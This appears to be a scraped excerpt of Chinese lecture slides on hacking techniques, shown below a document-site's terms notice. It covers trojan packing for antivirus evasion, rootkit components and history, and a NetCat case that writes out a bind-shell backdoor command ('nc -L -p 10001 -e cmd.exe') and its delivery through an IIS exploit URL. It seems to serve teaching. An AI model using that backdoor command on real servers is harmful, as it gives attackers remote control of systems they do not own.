- 1、本文档共58页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
黑客技术1
加壳的全称应该是可执行程序资源压缩,是保护文件的常用手段。加壳其实是利用特殊的算法,对EXE、DLL文件里的资源进行压缩,类似WINZIP的效果。加壳的程序可以直接运行,但是不能查看源代码。要经过脱壳才可以查看源代码。加了壳的程序通过Windows加载器载入内存后,先于源程序执行,得到控制权,执行过程中对原始程序进行还原,还原完成后再把控制权交给原始程序,执行原始代码的部分,这也就是所谓的脱壳。脱壳过程完全隐蔽,都在内存中完成。(段纲,2008) 木马文件加壳是黑客使用的老手段了,木马加壳的目的主要有两个:一是实现免 杀,二是减小体积。 因为加了壳的文件可以防止程序被人跟踪调试,防止算法程序被静态分析。但是如果特征码的查杀是内存中的查杀,那么木马文件就很难逃脱查杀了。 * * 旧的协议栈使用.0作为网络广播地址,而新的协议栈使用.255作为广播地址。 NetCat应用实例 针对IIS 的植入后门案例 首先将NetCat上载至一个IIS Server nc –L –p 10001 –e cmd.exe -L 告诉netcat不要中断联机而是等待联机 -p 我们所要listen特定的port -e 当联机后我们要执行的程序 将其转换成Unicode URL的command http://Exploit URL/c+nc+-L+-p+10001+-e+cmd.exe NetCat应用实例 在入侵的服务器上执行NetCat,启动NetCat在IIS上监听的端口(10001),执行cmd.exe程序 Rootkit Rootkit一词最早出现在Unix系统上。黑客为了取得系统管理员级的root权限,或者为了清除被系统记录的入侵痕迹,会重新编译一些软件程序(术语称为kit),例如ps、netstat、w、passwd等.这些软件即称作Rootkit,也被视为一项黑客技术。 Rootkit的组件 针对Unix和Linux的rootkit最多,rootkit是由几个独立的程序组成的,一个典型rootkit包括: 以太网嗅探器程序(network sniffer),用于获得网络上传输的用户名和密码等信息。 木马程序(trojan),例如:inetd或者login,为攻击者提供后门。 隐藏攻击者的目录和进程的程序,例如:ps、netstat、rshd和ls等。 日志清理工具(log cleaner),如:zap、zap2或者z2,清除wtmp、utmp和lastlog等日志文件 。 提供telnet、shell和finger等后门服务。 清理/var/log和/var/adm目录中其它文件的一些脚本。 监视网络流量和击键记录。 History of Rootkits 1989: Phrack 25 article by Black Tie Affair on wtmp wiping 1994: CERT advisory CA-1994-01 about SunOS rootkits 1996: Linux Rootkits (lrk3 released) 1997: Phrack 51 article by halflife on LKM-based rootkits 1998: Silvio Cesare’s kernel patching via kmem paper 1999: Greg Hoglund’s NT kernel rootkit paper Attack goals Network sniffer Including password grabber utility Password cracker Vulnerability scanners Autorooter Automatically applies exploits to host ranges DDOS tools Rootkit Types Binary Rootkits Replace user programs like ls, netstat, and ps to hide malicious activity Add backdoors to programs like login and sshd Library Rootkits Replace core system libraries (glibc) to intercept common system calls to hide activities and add backdoors Kernel Rootkits Modify system calls/structures that all user-mode programs rely on to lis
文档评论(0)